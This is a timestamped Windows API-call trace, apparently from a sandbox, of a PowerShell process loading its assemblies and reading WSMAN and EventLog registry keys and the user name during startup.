	[0354.259] VirtualQuery (in: lpAddress=0x10b920, lpBuffer=0x10c7e0, dwLength=0x30 | out: lpBuffer=0x10c7e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.259] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xb4c0176b, Data2=0xa8be, Data3=0x4981, Data4=([0]=0x8a, [1]=0xd4, [2]=0xfc, [3]=0x35, [4]=0x76, [5]=0xac, [6]=0xa2, [7]=0xa2))) returned 0x0
	[0354.259] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xb32f8ac7, Data2=0xd816, Data3=0x40e5, Data4=([0]=0xa2, [1]=0x5f, [2]=0xd2, [3]=0x90, [4]=0x16, [5]=0x95, [6]=0x5c, [7]=0x5b))) returned 0x0
	[0354.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0354.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0354.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0354.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0354.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0354.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0354.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0354.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0354.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0354.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0354.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0354.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0354.476] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.476] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.478] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.478] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.479] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.480] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.481] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.481] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.595] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.595] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.596] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.596] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.596] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.596] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d098 | out: phkResult=0x10d098*=0x1cc) returned 0x0
	[0354.605] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10cf9c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf98, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10cf9c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf98*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.605] CoTaskMemFree (pv=0x0) 
	[0354.606] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.606] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x0, lpValueName=0x3576b0, lpcchValueName=0x10d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0354.606] CoTaskMemFree (pv=0x3576b0) 
	[0354.606] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.606] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x1, lpValueName=0x3576b0, lpcchValueName=0x10d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0354.606] CoTaskMemFree (pv=0x3576b0) 
	[0354.606] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.606] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x2, lpValueName=0x3576b0, lpcchValueName=0x10d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x10d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0354.607] CoTaskMemFree (pv=0x3576b0) 
	[0354.607] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d02c, lpData=0x0, lpcbData=0x10d028*=0x0 | out: lpType=0x10d02c*=0x1, lpData=0x0, lpcbData=0x10d028*=0x8) returned 0x0
	[0354.607] CoTaskMemAlloc (cb=0xc) returned 0x3bb4a0
	[0354.607] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10cffc, lpData=0x3bb4a0, lpcbData=0x10cff8*=0x8 | out: lpType=0x10cffc*=0x1, lpData="2.0", lpcbData=0x10cff8*=0x8) returned 0x0
	[0354.607] CoTaskMemFree (pv=0x3bb4a0) 
	[0354.807] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cfe8 | out: phkResult=0x10cfe8*=0x32c) returned 0x0
	[0354.807] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ceec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cee8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ceec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cee8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.807] CoTaskMemFree (pv=0x0) 
	[0354.807] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.807] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x3576b0, lpcchValueName=0x10cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0354.807] CoTaskMemFree (pv=0x3576b0) 
	[0354.807] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.807] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x3576b0, lpcchValueName=0x10cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0354.807] CoTaskMemFree (pv=0x3576b0) 
	[0354.807] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.807] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x3576b0, lpcchValueName=0x10cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x10cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0354.807] CoTaskMemFree (pv=0x3576b0) 
	[0354.807] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10cf7c, lpData=0x0, lpcbData=0x10cf78*=0x0 | out: lpType=0x10cf7c*=0x1, lpData=0x0, lpcbData=0x10cf78*=0x8) returned 0x0
	[0354.807] CoTaskMemAlloc (cb=0xc) returned 0x3baea0
	[0354.807] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10cf4c, lpData=0x3baea0, lpcbData=0x10cf48*=0x8 | out: lpType=0x10cf4c*=0x1, lpData="2.0", lpcbData=0x10cf48*=0x8) returned 0x0
	[0354.807] CoTaskMemFree (pv=0x3baea0) 
	[0354.808] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.808] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.813] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0354.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.813] CoTaskMemFree (pv=0x1b7a89f0) 
	[0354.817] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d018 | out: phkResult=0x10d018*=0x2fc) returned 0x0
	[0354.820] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10cf8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10cf8c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.820] CoTaskMemFree (pv=0x0) 
	[0354.821] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.821] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x0, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.821] CoTaskMemFree (pv=0x3576b0) 
	[0354.821] CoTaskMemFree (pv=0x0) 
	[0354.821] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.821] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x1, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.821] CoTaskMemFree (pv=0x3576b0) 
	[0354.821] CoTaskMemFree (pv=0x0) 
	[0354.821] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.821] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x2, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.821] CoTaskMemFree (pv=0x3576b0) 
	[0354.821] CoTaskMemFree (pv=0x0) 
	[0354.821] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.821] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x3, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.821] CoTaskMemFree (pv=0x3576b0) 
	[0354.821] CoTaskMemFree (pv=0x0) 
	[0354.821] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.821] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x4, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.821] CoTaskMemFree (pv=0x3576b0) 
	[0354.821] CoTaskMemFree (pv=0x0) 
	[0354.821] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.822] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x5, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.822] CoTaskMemFree (pv=0x3576b0) 
	[0354.822] CoTaskMemFree (pv=0x0) 
	[0354.822] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.822] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x6, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.822] CoTaskMemFree (pv=0x3576b0) 
	[0354.822] CoTaskMemFree (pv=0x0) 
	[0354.822] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.822] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x7, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.822] CoTaskMemFree (pv=0x3576b0) 
	[0354.822] CoTaskMemFree (pv=0x0) 
	[0354.822] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0354.822] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x8, lpName=0x3576b0, lpcchName=0x10d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.822] CoTaskMemFree (pv=0x3576b0) 
	[0354.822] CoTaskMemFree (pv=0x0) 
	[0354.822] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x300) returned 0x0
	[0354.822] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x0) returned 0x2
	[0354.822] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x304) returned 0x0
	[0354.822] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x0) returned 0x2
	[0354.822] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x318) returned 0x0
	[0354.822] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x0) returned 0x2
	[0354.823] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x328) returned 0x0
	[0354.823] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x0) returned 0x2
	[0354.823] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x330) returned 0x0
	[0354.823] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x0) returned 0x2
	[0354.823] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x334) returned 0x0
	[0354.823] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x0) returned 0x2
	[0354.823] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x338) returned 0x0
	[0354.823] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x0) returned 0x2
	[0354.823] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x33c) returned 0x0
	[0354.823] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x0) returned 0x2
	[0354.823] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x340) returned 0x0
	[0354.823] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d078 | out: phkResult=0x10d078*=0x344) returned 0x0
	[0354.824] RegCloseKey (hKey=0x344) returned 0x0
	[0354.824] RegCloseKey (hKey=0x2fc) returned 0x0
	[0354.825] RegCloseKey (hKey=0x340) returned 0x0
	[0355.000] CoTaskMemAlloc (cb=0x804) returned 0x1b7bfed0
	[0355.000] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7bfed0, nSize=0x10d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d288) returned 0x1
	[0355.001] CoTaskMemFree (pv=0x1b7bfed0) 
	[0355.002] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.002] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d2c8) returned 1
	[0355.003] CoTaskMemFree (pv=0x3576b0) 
	[0355.162] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cfc8 | out: phkResult=0x10cfc8*=0x348) returned 0x0
	[0355.162] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10cf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10cf3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.162] CoTaskMemFree (pv=0x0) 
	[0355.162] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.162] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.162] CoTaskMemFree (pv=0x3576b0) 
	[0355.162] CoTaskMemFree (pv=0x0) 
	[0355.162] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.162] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.162] CoTaskMemFree (pv=0x3576b0) 
	[0355.162] CoTaskMemFree (pv=0x0) 
	[0355.162] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.162] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.162] CoTaskMemFree (pv=0x3576b0) 
	[0355.162] CoTaskMemFree (pv=0x0) 
